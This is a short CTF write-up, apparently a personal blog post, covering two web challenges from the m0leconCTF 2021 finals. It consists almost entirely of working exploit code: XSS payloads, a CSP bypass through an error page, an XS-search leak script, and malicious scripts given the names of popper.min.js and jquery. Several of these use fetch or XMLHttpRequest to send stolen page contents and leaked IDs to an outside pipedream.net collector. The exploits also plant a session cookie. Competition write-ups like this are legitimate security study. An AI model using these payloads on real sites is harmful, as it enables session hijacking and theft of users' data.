Profile

i love cat

as3617

m0leconCTF 2021 final web writeup

I'm sorry for writing only the exploit and scenario because I don't have enough time.

filesharing

#scenario

1. upload javascript file
2. share admin
3. xss in /play
4. bypass csp via error page
5 inject script into error page

exploit.js

a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
    a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);"

payload

https://filesharing.m0lec.one/play?xss=<script src="/upload/b56fe7aa9bac42d5b24d066807bb41a7"></script>

two in one

#scenario

1. leak admin's telegram id via xs search attack (iframe)
2. send payload to telegram bot
3. bypass samesite=strict and get flag using opener.opener trick

xsleak.html

<!DOCTYPE html>
<html>
<head>
    <title>exploit</title>
</head>
<body></body>
<script>
var chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_';
var charLen = chars.length;
var ENDPOINT = "https://telegrambotclient.m0lec.one/locations?search="
x = window.open('https://telegrambotclient.m0lec.one/locations?search=');
function sleep(t){
       return new Promise(resolve=>setTimeout(resolve,t));
}

async function search(leak,charCounter) {
    var curChar = chars[charCounter];
    console.log(curChar);
    x.location = 'https://telegrambotclient.m0lec.one/locations?search=' + leak + curChar;
    await sleep(100);
    if(x.window.frames.length != 0){
        var xhr = new XMLHttpRequest();
            xhr.open('GET', 'https://enllwt2ugqrt.x.pipedream.net/?cmd='+leak + curChar, true); 
            xhr.withCredentials = true; 
            xhr.send(null);    
        console.log("leak = " + leak + curChar);
        leak += curChar

    }
    search(leak , (charCounter +1 ) % chars.length);
}

function exploit(){
    search("y8ww",0);
}
fetch('https://enllwt2ugqrt.x.pipedream.net/?start');
exploit();
</script>
</html>

rdr.html

<img src=https://httpstat.us/200?sleep=9000>
<img src=x onerror="
       let s=window.open('https://telegrambotclient.m0lec.one/messages','s')
       fetch('https://enllwt2ugqrt.x.pipedream.net/?start=start')
       ">

/static/js/popper.min.js

if(document.location.href=="https://telegrambotclient.m0lec.one/messages"){
a = window.open('https://telegrambotclient.m0lec.one/' + 'x'.repeat(4100));
setTimeout(function() {
                    a.document.body.innerHTML = `<img src=x onerror="setTimeout(function(){window.open('https://note.m0lec.one/logout');},700);setTimeout(function(){ document.cookie='session=.eJwljjFuQzEMQ-_iuYMs27KUy3xIloQEBVrg_2Qqeve46MCBBPjIn3LkGde93J7nKz7K8fByK0zObJALYCSSpiqaYyMeIn1CLBECYBLLSVFFKyUs4WUdgXpdtZlxM00CaqBbgNbrBpiGcwVI4U3NGVmTjBACp7o7kmHZR15XnP9v-rbrOvN4fn_G1w6Gx1-38d7ZxI5zgOpAwDFF6kSHEMgsv2-Y5j5D.YaomgA.58rKF-PLOJEKpL0BnaaZrpFx3to; domain=m0lec.one'},1700);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},1900);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2100);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2300);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2500);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},3000)">`;
        }, 300);
setTimeout(function(){document.location = 'https://note.m0lec.one/note?id=1';},500);

/static/js/jquery-3.3.1.slim.min.js

fetch('https://enllwt2ugqrt.x.pipedream.net/?aa='+opener.opener.document.location.href+'&x='+btoa(opener.opener.document.body.innerHTML))

payload

https://a.com/&gt;a&lt;/a&gt;&lt;base/href=&quot;https://ssrf.kr&quot;&gt;

report

https://ssrf.kr/rdr.html

'ctf writeup' 카테고리의 다른 글

Codegate 2022 Preliminary writeup  (0) 2022.02.27
Real World CTF 4th - web writeup  (0) 2022.01.30
HK CERT CTF 2021 writeup - WEB  (0) 2021.11.14
CyberGuardians CTF all writeup  (0) 2021.11.10
Hack.lu CTF 2021 - web writeup  (1) 2021.10.31